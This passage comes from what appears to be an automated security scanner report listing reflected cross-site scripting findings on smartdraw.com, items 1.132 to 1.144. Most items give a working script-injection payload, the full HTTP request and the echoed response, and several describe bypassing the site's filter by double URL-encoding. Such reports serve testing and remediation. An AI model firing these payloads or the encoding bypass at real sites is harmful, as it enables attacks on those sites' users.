1.132. http://www.smartdraw.com/buy/x22 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /buy/x22

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1baf%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522056ce7adff3 was submitted in the REST URL parameter 2. This input was echoed as c1baf"style="x:expression(alert(1))"056ce7adff3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /buy/x22c1baf%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522056ce7adff3 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:30:05 GMT
Content-Length: 8732
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:30:05 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:30:05 GMT; path=/
Set-Cookie: ASP.NET_SessionId=dvui0v455qaojrfdct104guc; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:30:05 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/buy/x22c1baf"style="x:expression(alert(1))"056ce7adff3/" rel="nofollow" target="_blank">
...[SNIP]...

1.133. http://www.smartdraw.com/buy/x22 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /buy/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61661"style%3d"x%3aexpression(alert(1))"aa36938865b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 61661"style="x:expression(alert(1))"aa36938865b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /buy/x22?61661"style%3d"x%3aexpression(alert(1))"aa36938865b=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:50 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:50 GMT; path=/
Set-Cookie: ASP.NET_SessionId=zuev0255yk14t1frw24v3j55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8753
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/buy/x22/?61661"style="x:expression(alert(1))"aa36938865b=1&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80p
...[SNIP]...

1.134. http://www.smartdraw.com/buy/x22 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /buy/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47b9c"style%3d"x%3aexpression(alert(1))"07d1f7b8086 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 47b9c"style="x:expression(alert(1))"07d1f7b8086 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /buy/x22?47b9c"style%3d"x%3aexpression(alert(1))"07d1f7b8086=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:48 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:48 GMT; path=/
Set-Cookie: ASP.NET_SessionId=sbcbwyb2aq3qzfu15i0dsh55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8753
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/buy/x22/?47b9c"style="x:expression(alert(1))"07d1f7b8086=1" rel="nofollow" target="_blank">
...[SNIP]...

1.135. http://www.smartdraw.com/downloads [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /downloads

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a862%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8fd8df6ce03 was submitted in the REST URL parameter 1. This input was echoed as 2a862"><script>alert(1)</script>8fd8df6ce03 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /2a862%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8fd8df6ce03?id=340839/x22/x3eSmartDraw HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:32 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:32 GMT; path=/
Set-Cookie: ASP.NET_SessionId=dc5mez55nymwryfaavsylt55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8844
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/2a862"><script>alert(1)</script>8fd8df6ce03/?id=340839/x22/x3eSmartDraw&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidde
...[SNIP]...

1.136. http://www.smartdraw.com/downloads [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /downloads

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fd6e%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252271fe023e54 was submitted in the REST URL parameter 1. This input was echoed as 6fd6e"style="x:expression(alert(1))"71fe023e54 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /downloads6fd6e%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252271fe023e54 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:27 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:27 GMT; path=/
Set-Cookie: ASP.NET_SessionId=yyv5x0450piuis45ejmzuryy; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8739
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/downloads6fd6e"style="x:expression(alert(1))"71fe023e54/" rel="nofollow" target="_blank">
...[SNIP]...

1.137. http://www.smartdraw.com/downloads [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /downloads

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96d2c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e26549339e2c was submitted in the REST URL parameter 1. This input was echoed as 96d2c"><script>alert(1)</script>26549339e2c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /downloads96d2c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e26549339e2c?id=340839/x22/x3eSmartDraw HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:29 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:29 GMT; path=/
Set-Cookie: ASP.NET_SessionId=q4uupajw15d2f4bqiizdyum2; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8907
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/downloads96d2c"><script>alert(1)</script>26549339e2c/?id=340839/x22/x3eSmartDraw" rel="nofollow" target="_blank">
...[SNIP]...

1.138. http://www.smartdraw.com/downloads [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /downloads

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75a12%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25228ae5fca1f39 was submitted in the REST URL parameter 1. This input was echoed as 75a12"style="x:expression(alert(1))"8ae5fca1f39 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /75a12%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25228ae5fca1f39 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:29:31 GMT
Content-Length: 8683
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:31 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:31 GMT; path=/
Set-Cookie: ASP.NET_SessionId=jl33dq55fge2ij55usujg355; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:29:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/75a12"style="x:expression(alert(1))"8ae5fca1f39/&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80px
...[SNIP]...

1.139. http://www.smartdraw.com/downloads [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /downloads

Issue detail

The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1f7d"><script>alert(1)</script>1bd1fdf7711 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /downloads?id=340839/x22/x3eSmartDrawa1f7d"><script>alert(1)</script>1bd1fdf7711 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:29:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:19 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:19 GMT; path=/
Set-Cookie: ASP.NET_SessionId=t1kmf52brnpipl45gqynblnt; path=/; HttpOnly
Set-Cookie: SDPROSPECTID=6D7F9BCA-D794-4445-857B-A18698F1B8C9; expires=Sun, 03-Feb-2041 20:29:19 GMT; path=/
Set-Cookie: TRV=1; expires=Sun, 03-Feb-2041 20:29:19 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12947
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/downloads/index.htm?id=340839/x22/x3eSmartDrawa1f7d"><script>alert(1)</script>1bd1fdf7711" rel="nofollow" target="_blank">
...[SNIP]...

1.140. http://www.smartdraw.com/downloads [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /downloads

Issue detail

The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5facb"><script>alert(1)</script>49b68308620 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /downloads?id=5facb"><script>alert(1)</script>49b68308620 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:29:20 GMT
Content-Length: 12786
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:20 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:20 GMT; path=/
Set-Cookie: ASP.NET_SessionId=no3m3ona4ywt5ufehqdinuiv; path=/; HttpOnly
Set-Cookie: SDPROSPECTID=83434CAF-2F0B-4058-B666-16AC15340351; expires=Sun, 03-Feb-2041 20:29:20 GMT; path=/
Set-Cookie: TRV=1; expires=Sun, 03-Feb-2041 20:29:20 GMT; path=/
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:29:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/downloads/index.htm?id=5facb"><script>alert(1)</script>49b68308620&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80px;
...[SNIP]...

1.141. http://www.smartdraw.com/downloads [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /downloads

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8433d"><script>alert(1)</script>f5beed3ebcb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /downloads?8433d"><script>alert(1)</script>f5beed3ebcb=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:29:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:18 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:18 GMT; path=/
Set-Cookie: ASP.NET_SessionId=bx0e1x45yaxnbvqv5rl1lobn; path=/; HttpOnly
Set-Cookie: SDPROSPECTID=B5B6DB7A-34F1-4878-9BA4-22EAB7B1DC13; expires=Sun, 03-Feb-2041 20:29:18 GMT; path=/
Set-Cookie: TRV=1; expires=Sun, 03-Feb-2041 20:29:18 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12779
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/downloads/index.htm?8433d"><script>alert(1)</script>f5beed3ebcb=1" rel="nofollow" target="_blank">
...[SNIP]...

1.142. http://www.smartdraw.com/downloads [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /downloads

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9aec6"><script>alert(1)</script>133a985f46b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /downloads?9aec6"><script>alert(1)</script>133a985f46b=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:29:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:20 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:20 GMT; path=/
Set-Cookie: ASP.NET_SessionId=eu0eua45v2ntfszry5fsxg45; path=/; HttpOnly
Set-Cookie: SDPROSPECTID=5FEDCD2D-3EF7-4E28-9941-1289D6269030; expires=Sun, 03-Feb-2041 20:29:20 GMT; path=/
Set-Cookie: TRV=1; expires=Sun, 03-Feb-2041 20:29:20 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12779
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/downloads/index.htm?9aec6"><script>alert(1)</script>133a985f46b=1&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80p
...[SNIP]...

1.143. http://www.smartdraw.com/downloads/x22 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /downloads/x22

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e0fd%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522c7b5f3c9049 was submitted in the REST URL parameter 1. This input was echoed as 7e0fd"style="x:expression(alert(1))"c7b5f3c9049 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /7e0fd%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522c7b5f3c9049/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:53 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:53 GMT; path=/
Set-Cookie: ASP.NET_SessionId=muhiv555hhwxlq45i4d30a2z; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8711
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/7e0fd"style="x:expression(alert(1))"c7b5f3c9049/x22/&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:
...[SNIP]...

1.144. http://www.smartdraw.com/downloads/x22 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /downloads/x22

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2601%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522cc75ed19a87 was submitted in the REST URL parameter 1. This input was echoed as b2601"style="x:expression(alert(1))"cc75ed19a87 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

